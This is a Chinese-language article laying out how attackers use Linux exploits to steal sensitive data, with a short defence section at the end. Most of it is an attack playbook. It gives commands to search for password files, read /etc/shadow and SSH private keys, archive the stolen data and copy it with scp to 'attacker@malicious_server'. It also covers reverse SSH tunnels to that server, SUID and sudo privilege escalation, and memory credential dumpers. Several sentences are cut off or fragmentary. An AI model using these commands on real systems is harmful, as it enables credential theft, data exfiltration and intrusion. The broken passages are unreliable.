Linux Exploit获取敏感信息的核心路径与具体方法
Linux Exploit的本质是利用系统或应用中的漏洞,突破权限限制并窃取敏感数据。其获取敏感信息的流程可分为漏洞利用前置准备、敏感信息直接窃取、权限提升强化窃取能力、横向扩展扩大数据获取范围四大环节,每个环节均有对应的典型技术与工具。
在窃取敏感信息前,攻击者需先通过信息收集明确目标系统中的敏感数据存储位置(如用户凭证、配置文件、数据库),并通过漏洞扫描找到可利用的漏洞入口。
find命令查找系统中的敏感目录(如/etc下的配置文件、/home下的用户文件、/var/log下的日志文件),例如find / -name "*.conf" 2>/dev/null可定位配置文件,find / -name "passwd*" 2>/dev/null可快速找到密码相关文件;也可通过grep命令全局搜索敏感关键词(如password=、secret),例如grep -rn "password=" /会递归搜索整个系统中的密码字段。nmap扫描目标主机的开放端口及服务版本(如nmap -sV <target_ip>),识别可能存在漏洞的服务(如SSH、Apache、MySQL);再通过CVE数据库(如NVD、CVE Details)或漏洞扫描工具(如Nessus、OpenVAS)查询目标系统是否存在已知漏洞(如Log4j漏洞、Shellshock漏洞)。攻击者通过漏洞获得初始访问权限后,会采用以下方式直接获取敏感信息:
/etc/passwd:存储用户账户信息(包括用户名、UID、家目录),可通过cat /etc/passwd查看(虽然现代Linux系统中密码哈希存储在/etc/shadow,但仍可通过该文件获取用户列表);/etc/shadow:存储用户密码哈希(需root权限),可使用cat /etc/shadow查看(若权限不足,可通过漏洞提权后读取);/var/log/auth.log(Ubuntu/Debian)或/var/log/secure(CentOS/RHEL):存储SSH登录记录(包括用户名、登录时间、IP地址),可通过tail -n 100 /var/log/auth.log查看最近的登录记录;/home/user/.ssh/id_rsa):存储SSH私钥,若私钥未加密,可用于无密码登录其他系统。tar、scp、rsync等工具将敏感文件打包并传输到攻击者控制的服务器。例如,tar -czf sensitive_data.tar.gz /etc/passwd /etc/shadow /home可将密码文件和用户家目录打包;scp sensitive_data.tar.gz attacker@malicious_server:/tmp/可通过SCP协议将文件传输到远程服务器。初始访问权限(如普通用户)往往无法访问所有敏感信息(如/etc/shadow),因此攻击者需通过漏洞利用或配置错误提升权限至root:
find / -perm -4000 2>/dev/null),利用其漏洞提升权限(如/usr/bin/find的漏洞可允许普通用户执行任意命令)。/etc/sudoers文件中的不当配置(如ALL=(ALL)允许用户无密码执行所有sudo命令),通过sudo -l查看当前用户的sudo权限,利用配置错误执行高权限命令(如sudo /bin/bash直接获取root Shell)。获取root权限后,攻击者会通过横向移动感染内网中的其他设备,扩大敏感数据的获取范围:
ssh -R 1080:localhost:22 attacker@malicious_server)将目标系统的SSH端口映射到攻击者的服务器,实现远程访问;或使用SSH动态端口转发(如ssh -D 1080 attacker@malicious_server)创建SOCKS代理,隐藏流量。mimipenguin(Linux下的密码抓取工具,需root权限)从内存中提取明文密码(支持Kali、Ubuntu等系统);或使用Impost3r(C语言编写)窃取SSH、su、sudo等凭证;还可通过swap_digger(自动化脚本)分析交换分区,提取用户凭据、WiFi密钥等信息。nmap扫描内网中的存活主机(如nmap -Pn 192.168.1.0/24)和开放端口(如for ip in {1..254}; do ping -c 1 192.168.1.$ip; done批量探测),找到其他可攻击的目标。为防止攻击者通过Exploit获取敏感信息,需采取以下防御措施:
apt update && apt upgrade),修补已知漏洞;chmod 600 /etc/shadow、chmod 700 /root);